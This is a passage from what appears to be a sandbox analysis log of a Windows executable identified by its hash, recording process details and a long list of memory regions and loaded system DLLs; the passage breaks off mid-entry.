# Flog Txt Version 1 # Analyzer Version: 4.5.1 # Analyzer Build Date: May 9 2022 06:24:19 # Log Creation Date: 30.06.2022 12:27:33.727 Process: id = "1" image_name = "0e66029132a885143b87b1e49e32663a52737bbff4ab96186e9e5e829aa2915f.exe" filename = "c:\\users\\keecfmwgj\\desktop\\0e66029132a885143b87b1e49e32663a52737bbff4ab96186e9e5e829aa2915f.exe" page_root = "0x456a2000" os_pid = "0xf64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x788" cmd_line = "\"C:\\Users\\kEecfMwgj\\Desktop\\0e66029132a885143b87b1e49e32663a52737bbff4ab96186e9e5e829aa2915f.exe\" " cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f2de" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 114 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 115 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 116 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 117 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 118 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 119 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 120 start_va = 0x400000 end_va = 0x41dfff monitored = 1 entry_point = 0x40f970 region_type = mapped_file name = "0e66029132a885143b87b1e49e32663a52737bbff4ab96186e9e5e829aa2915f.exe" filename = "\\Users\\kEecfMwgj\\Desktop\\0e66029132a885143b87b1e49e32663a52737bbff4ab96186e9e5e829aa2915f.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\0e66029132a885143b87b1e49e32663a52737bbff4ab96186e9e5e829aa2915f.exe") Region: id = 121 start_va = 0x76f70000 end_va = 0x77118fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 122 start_va = 0x77150000 end_va = 0x772cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 123 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 124 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 125 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 126 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 127 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 128 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 129 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 269 start_va = 0x1e0000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 270 start_va = 0x749d0000 end_va = 0x749d7fff monitored = 0 entry_point = 0x749d20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 271 start_va = 0x749e0000 end_va = 0x74a3bfff monitored = 0 entry_point = 0x74a1f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 272 start_va = 0x74a40000 end_va = 0x74a7efff monitored = 0 entry_point = 0x74a6e088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 273 start_va = 0x76e50000 end_va = 0x76f6efff monitored = 0 entry_point = 0x76e65340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 274 start_va = 0x75620000 end_va = 0x7572ffff monitored = 0 entry_point = 0x75633283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 275 start_va = 0x76e50000 end_va = 0x76f6efff monitored = 0 entry_point = 0x76e65340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 276 start_va = 0x76e50000 end_va = 0x76f6efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076e50000" filename = "" Region: id = 277 start_va = 0x76d50000 end_va = 0x76e49fff monitored = 0 entry_point = 0x76d6a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 278 start_va = 0x76d50000 end_va = 0x76e49fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076d50000" filename = "" Region: id = 279 start_va = 0x260000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 280 start_va = 0x75620000 end_va = 0x7572ffff monitored = 0 entry_point = 0x75633283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 281 start_va = 0x74dc0000 end_va = 0x74e06fff monitored = 0 entry_point = 0x74dc74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 282 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 283 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 284 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 285 start_va = 0x420000 end_va = 0x486fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 286 start_va = 0x74b70000 end_va = 0x74b80fff monitored = 0 entry_point = 0x74b71300 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 287 start_va = 0x74b60000 end_va = 0x74b68fff monitored = 0 entry_point = 0x74b615a6 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 288 start_va = 0x752c0000 end_va = 0x7536bfff monitored = 0 entry_point = 0x752ca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 289 start_va = 0x74b40000 end_va = 0x74b58fff monitored = 0 entry_point = 0x74b41319 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 290 start_va = 0x76450000 end_va = 0x7653ffff monitored = 0 entry_point = 0x76460569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 291 start_va = 0x74ca0000 end_va = 0x74cfffff monitored = 0 entry_point = 0x74cba3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 292 start_va = 0x74c90000 end_va = 0x74c9bfff monitored = 0 entry_point = 0x74c910e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 293 start_va = 0x74e10000 end_va = 0x74e28fff monitored = 0 entry_point = 0x74e14975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 294 start_va = 0x74b30000 end_va = 0x74b3efff monitored = 0 entry_point = 0x74b312a1 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 295 start_va = 0x73cc0000 end_va = 0x73cdbfff monitored = 0 entry_point = 0x73cca431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 296 start_va = 0x754d0000 end_va = 0x754d5fff monitored = 0 entry_point = 0x754d1782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 297 start_va = 0x73cb0000 end_va = 0x73cb6fff monitored = 0 entry_point = 0x73cb128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 298 start_va = 0x76920000 end_va = 0x76954fff monitored = 0 entry_point = 0x7692145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 299 start_va = 0x754f0000 end_va = 0x75610fff monitored = 0 entry_point = 0x754f158e region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 300 start_va = 0x74d50000 end_va = 0x74d5bfff monitored = 0 entry_point = 0x74d5238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 301 start_va = 0x722b0000 end_va = 0x7243ffff monitored = 0 entry_point = 0x7234d026 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll") Region: id = 302 start_va = 0x74f70000 end_va = 0x7506ffff monitored = 0 entry_point = 0x74f8b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 303 start_va = 0x76ae0000 end_va = 0x76b6ffff monitored = 0 entry_point = 0x76af6343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 304 start_va = 0x77120000 end_va = 0x77129fff monitored = 0 entry_point = 0x771236a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 305 start_va = 0x76740000 end_va = 0x767dcfff monitored = 0 entry_point = 0x76773fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 306 start_va = 0x767e0000 end_va = 0x7687ffff monitored = 0 entry_point = 0x767f49e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 307 start_va = 0x75370000 end_va = 0x754cbfff monitored = 0 entry_point = 0x753bba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 308 start_va = 0x76540000 end_va = 0x76596fff monitored = 0 entry_point = 0x76559ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 309 start_va = 0x74b10000 end_va = 0x74b21fff monitored = 0 entry_point = 0x74b11200 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 310 start_va = 0x75730000 end_va = 0x76379fff monitored = 0 entry_point = 0x757b1601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 311 start_va = 0x490000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 312 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 313 start_va = 0x540000 end_va = 0x6c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 314 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 315 start_va = 0x769f0000 end_va = 0x76a4ffff monitored = 0 entry_point = 0x76a0158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 316 start_va = 0x76380000 end_va = 0x7644bfff monitored = 0 entry_point = 0x7638168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 317 start_va = 0x6d0000 end_va = 0x850fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 318 start_va = 0x860000 end_va = 0x1c5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000860000" filename = "" Region: id = 319 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 320 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 321 start_va = 0x1a0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 322 start_va = 0x1c60000 end_va = 0x1d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c60000" filename = "" Region: id = 323 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 324 start_va = 0x260000 end_va = 0x29ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 325 start_va = 0x2a0000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 326 start_va = 0x1d60000 end_va = 0x1e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d60000" filename = "" Region: id = 327 start_va = 0x73d30000 end_va = 0x73d50fff monitored = 0 entry_point = 0x73d3145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 328 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 329 start_va = 0x74d00000 end_va = 0x74d44fff monitored = 0 entry_point = 0x74d011e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 330 start_va = 0x3a0000 end_va = 0x3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 331 start_va = 0x490000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 332 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 333 start_va = 0x1e60000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 334 start_va = 0x1f60000 end_va = 0x205ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 335 start_va = 0x7efaa000 end_va = 0x7efacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 336 start_va = 0x7efad000 end_va = 0x7efaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 337 start_va = 0x2060000 end_va = 0x215ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 338 start_va = 0x73bb0000 end_va = 0x73c2ffff monitored = 0 entry_point = 0x73bc37c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 339 start_va = 0x3a0000 end_va = 0x3affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 340 start_va = 0x1e60000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 341 start_va = 0x2160000 end_va = 0x223efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002160000" filename = "" Region: id = 342 start_va = 0x3b0000 end_va = 0x3bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 343 start_va = 0x3b0000 end_va = 0x3c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 344 start_va = 0x3d0000 end_va = 0x3ddfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 345 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 346 start_va = 0x2240000 end_va = 0x250efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 347 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 348 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 349 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 350 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 351 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 352 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 353 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 354 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 355 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 356 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 357 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 358 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 359 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 360 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 361 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 362 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 363 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 364 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 365 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 366 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 367 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 368 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 369 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 370 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 371 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 372 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 373 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 374 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 375 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 376 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 377 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 378 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 379 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 380 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 381 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 382 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 383 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 384 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 385 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 386 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 387 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 388 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 389 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 390 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 391 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 392 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 393 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 394 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 395 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 396 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 397 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 398 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 399 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 400 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 401 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 402 start_va = 0x3b0000 end_va = 0x3bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename 